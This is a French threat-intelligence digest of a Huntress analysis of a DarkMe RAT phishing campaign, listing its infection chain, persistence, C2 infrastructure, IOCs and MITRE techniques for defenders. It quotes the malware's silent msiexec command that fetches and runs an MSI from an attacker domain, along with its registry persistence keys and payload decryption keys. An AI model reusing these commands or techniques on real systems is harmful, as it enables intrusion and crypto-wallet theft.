đ Contexte
Publié le 22 septembre 2026 par Huntress (James Northey et Andrew Brandt), cet article documente deux incidents distincts détectés le 31 août 2026 impliquant le malware DarkMe, un RAT/espion écrit en Visual Basic 6 (VB6) précédemment attribué au groupe APT Water Hydra (alias EvilNum / Operation DarkCasino).
đŻ Changement de vecteur d’accĂšs initial
Contrairement aux campagnes de 2023-2024 qui exploitaient deux zero-days (CVE-2023-38831 WinRAR et CVE-2024-21412 Windows Defender SmartScreen), cette nouvelle campagne repose exclusivement sur l’ingĂ©nierie sociale :
- Un email de phishing contient un lien vers une URL apparemment anodine (
readonline365[.]com/view/image.png) - Le serveur délivre un fichier image.pif (exécutable PE32+, 1 Mo) déguisé en image
- L’extension
.pif(Program Information File, relique DOS) est exécutée directement par Windows
âïž ChaĂźne d’infection dĂ©taillĂ©e
Ătape 1 â Staging via msiexec :
- Le
.pifinvoquemsiexec /i https://onlineview365[.]com/propi.msi /quiet /norestart - Le MSI est construit avec exemsi MSI Wrapper sous le nom de couverture “PrinterFind Softwares”
- Extraction d’une archive CAB vers
%AppData%\ComponentsFolder\ - Exécution du script prnfig.wsf (WSF/VBScript)
Ătape 2 â Script de staging (prnfig.wsf) :
- Copie tous les fichiers dans
%AppData%\ComponentsFolder\ - Copie
clspack.exe(binaire Microsoft légitime signé) dans%AppData%\Microsoft\ - GénÚre
filetext2.txt(template de registre pour enregistrement COM) - Lance :
rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
Ătape 3 â Trois loaders VB6 en chaĂźne :
- Coconout.dll (28 Ko) : loader COM stage 1, instancié par CLSID via
/sta - Use.dll : stage 2, contient une gate anti-sandbox de 329 applications (wallets, terminaux de trading, jeux, utilitaires RGB) â si aucune n’est trouvĂ©e, l’exĂ©cution s’arrĂȘte
- Finalized.dll (1,1 Mo) : stage 3, profile le systÚme, déchiffre le payload
company.ceret effectue le process hollowing dansclspack.exe
Ătape 4 â DĂ©chiffrement du payload :
- Clé :
Nobodygoingout - Routine RC4 cassĂ©e (swap manquant) â dĂ©gĂ©nĂšre en XOR single-byte
0x02aprÚs 7 octets - Les 7 premiers octets sont réellement chiffrés (stub MZ/DOS header)
- Hash correct du payload :
54ed18aa883b53794810be0428b3a0167758183c5b3ba5660af747dc81dd5b76
đ Persistance
Mécanisme en deux parties :
- Enregistrement d’un handler de protocole personnalisĂ©
Locked://sousHKCU\Software\Classes\Locked\shell\open\commandâ pointe versrundll32.exe /sta {CFDC57BA-...} - ClĂ© Run :
explorer.exe "Locked://Newest"â masque le processus parent malveillant derriĂšre Explorer
đ Infrastructure C2
- Domaine C2 :
thatawful[.]boutique(déchiffré par RC4 avec la cléonlywayhere23!$$#@!!35@!12) - IP C2 :
67.43.50[.]11:7712(hébergé via Voxility/ColoGuys à Prague) - Le serveur expose RDP (3389), WinRM (5985, 47001), DCERPC (135)
- Hostname Windows leaked via certificat TLS auto-signé :
WIN-78P55T5IL26 - Redirection 302 vers
effectivecpmnetwork[.]comsur les ports 80/443
đŠ CapacitĂ©s du RAT DarkMe confirmĂ©es
- Vol de wallets crypto (MetaMask, Ledger, Exodus, Trezor, Phantom)
- Capture d’Ă©cran via GDI+
- ĂnumĂ©ration antivirus via WMI (
SELECT * FROM AntivirusProduct) - Manipulation de fichiers et exécution de commandes via canal TCP custom (wsock32)
- Verbes C2 en espagnol/italien : SHLEXE, ZIPALO, COPALO, PASALO, DELMAP, STRFLS
đïž Infrastructure de livraison
Cinq domaines de livraison identifiés via VirusTotal :
storageonline[.]me,readonline365[.]com,viewdocument[.]live,advancedfuturetechnology[.]com,sharedfuturetech[.]com- Hash unique du dropper :
394c93df...servi par 4 domaines simultanĂ©ment sharedfuturetech[.]comhĂ©berge Ă©galement une campagne ClickFix distincte livrant un stealer dĂ©rivĂ© d’Efimer
đ Type d’article
Analyse technique approfondie publiĂ©e par Huntress, documentant une nouvelle campagne DarkMe avec dĂ©composition complĂšte de la chaĂźne d’infection, des loaders, du mĂ©canisme de persistance, de l’infrastructure C2 et des IOCs associĂ©s.
đ§ TTPs et IOCs dĂ©tectĂ©s
Acteurs de menace
- Water Hydra (cybercriminal) â orkl.eu
- EvilNum (cybercriminal) â orkl.eu · Malpedia · MITRE ATT&CK
TTP
- T1566.002 â Phishing: Spearphishing Link (Initial Access)
- T1204.002 â User Execution: Malicious File (Execution)
- T1218.007 â System Binary Proxy Execution: Msiexec (Defense Evasion)
- T1218.011 â System Binary Proxy Execution: Rundll32 (Defense Evasion)
- T1055.012 â Process Injection: Process Hollowing (Defense Evasion)
- T1547.001 â Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Persistence)
- T1112 â Modify Registry (Defense Evasion)
- T1027 â Obfuscated Files or Information (Defense Evasion)
- T1140 â Deobfuscate/Decode Files or Information (Defense Evasion)
- T1497.001 â Virtualization/Sandbox Evasion: System Checks (Defense Evasion)
- T1071.001 â Application Layer Protocol: Web Protocols (Command and Control)
- T1573.001 â Encrypted Channel: Symmetric Cryptography (Command and Control)
- T1041 â Exfiltration Over C2 Channel (Exfiltration)
- T1005 â Data from Local System (Collection)
- T1113 â Screen Capture (Collection)
- T1012 â Query Registry (Discovery)
- T1057 â Process Discovery (Discovery)
- T1518.001 â Software Discovery: Security Software Discovery (Discovery)
- T1036.005 â Masquerading: Match Legitimate Name or Location (Defense Evasion)
- T1559.001 â Inter-Process Communication: Component Object Model (Execution)
IOC
- IPv4 :
67.43.50.11â AbuseIPDB · VT · ThreatFox - Domaines :
readonline365.comâ VT · URLhaus · ThreatFox - Domaines :
onlineview365.comâ VT · URLhaus · ThreatFox - Domaines :
thatawful.boutiqueâ VT · URLhaus · ThreatFox - Domaines :
storageonline.meâ VT · URLhaus · ThreatFox - Domaines :
viewdocument.liveâ VT · URLhaus · ThreatFox - Domaines :
advancedfuturetechnology.comâ VT · URLhaus · ThreatFox - Domaines :
sharedfuturetech.comâ VT · URLhaus · ThreatFox - Domaines :
megchartedbk7.comâ VT · URLhaus · ThreatFox - Domaines :
effectivecpmnetwork.comâ VT · URLhaus · ThreatFox - URLs :
https://readonline365.com/view/image.pngâ URLhaus - URLs :
https://onlineview365.com/propi.msiâ URLhaus - SHA256 :
394c93dfbb7581c66a23c52b20cd90b31415c0825a2eab7107e60ee3fe693c04â VT · MalwareBazaar - SHA256 :
9fb5888f9ac99227a35f3e08ca08bfb9eed676e1f91638599eba0d7a5aac847fâ VT · MalwareBazaar - SHA256 :
1c923c685f97e556f241d0f1880283500a61dc7ecae8cafe75f34c720ff6b918â VT · MalwareBazaar - SHA256 :
52b242047a8055c0936b384b952c1c16c1072a590610140b01f4acefa8ae883aâ VT · MalwareBazaar - SHA256 :
4a18f65ab7de7be385cbcebc78c9ae49334294f93726822b8900f9b7a324a6b0â VT · MalwareBazaar - SHA256 :
3052352ac811c48590f0239281312c35560fc06b4dc39790e365eb1e7cab8634â VT · MalwareBazaar - SHA256 :
d7185bd7b450b478c793ece3025bdd867eed70bb7b739a5f26375b5ba6cf0d93â VT · MalwareBazaar - SHA256 :
54ed18aa883b53794810be0428b3a0167758183c5b3ba5660af747dc81dd5b76â VT · MalwareBazaar - SHA256 :
2915efecf2a01ce0b3ef49c47666ec43c326e7804df10e5859db5f08eeca8a37â VT · MalwareBazaar - CVEs :
CVE-2023-38831â NVD · CIRCL - CVEs :
CVE-2024-21412â NVD · CIRCL - Fichiers :
image.pif - Fichiers :
propi.msi - Fichiers :
prnfig.wsf - Fichiers :
filetext.txt - Fichiers :
filetext2.txt - Fichiers :
Coconout.dll - Fichiers :
Use.dll - Fichiers :
Finalized.dll - Fichiers :
company.cer - Fichiers :
clspack.exe - Fichiers :
clspack.exe - Chemins :
%AppData%\ComponentsFolder\ - Chemins :
%AppData%\Microsoft\clspack.exe - Chemins :
%AppData%\ComponentsFolder\Coconout.dll - Chemins :
%AppData%\ComponentsFolder\company.cer - Chemins :
%TEMP%\Zeta_Component.log
â ïž Ă propos de ces IOC â ils sont extraits automatiquement de l’article original le 25 septembre 2026 et n’ont pas fait l’objet d’une vĂ©rification externe. Un indicateur peut avoir Ă©tĂ© rĂ©attribuĂ© depuis : une IP de C2 peut redevenir un service lĂ©gitime, un domaine sinkholĂ© peut changer de propriĂ©taire. Aucune garantie d’exactitude ni d’actualitĂ© â contrĂŽlez leur validitĂ© avant tout usage opĂ©rationnel, en particulier avant de les injecter dans une blocklist ou un SIEM.
Malware / Outils
- DarkMe (rat)
- exemsi MSI Wrapper (tool)
đą Indice de vĂ©rification factuelle : 100/100 (haute)
- â huntress.com â source reconnue (liste interne) (20pts)
- â 39569 chars â texte complet (fulltext extrait) (15pts)
- â 39 IOCs dont des hashes (15pts)
- â 7/9 IOCs confirmĂ©s (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
- â 20 TTPs MITRE identifiĂ©es (15pts)
- â date extraite du HTML source (10pts)
- â acteur(s) identifiĂ©(s) : Water Hydra, EvilNum (5pts)
- â 2/2 CVE(s) confirmĂ©e(s) (CIRCL) (5pts)
IOCs confirmés externellement :
67.43.50.11(ip) â VT (7/91 dĂ©tections)394c93dfbb7581c6âŠ(sha256) â VT (14/76 dĂ©tections)9fb5888f9ac99227âŠ(sha256) â VT (12/76 dĂ©tections)1c923c685f97e556âŠ(sha256) â VT (5/76 dĂ©tections)readonline365.com(domain) â VT (5/91 dĂ©tections)
đ Source originale : https://www.huntress.com/blog/darkme-rat-abandons-exploits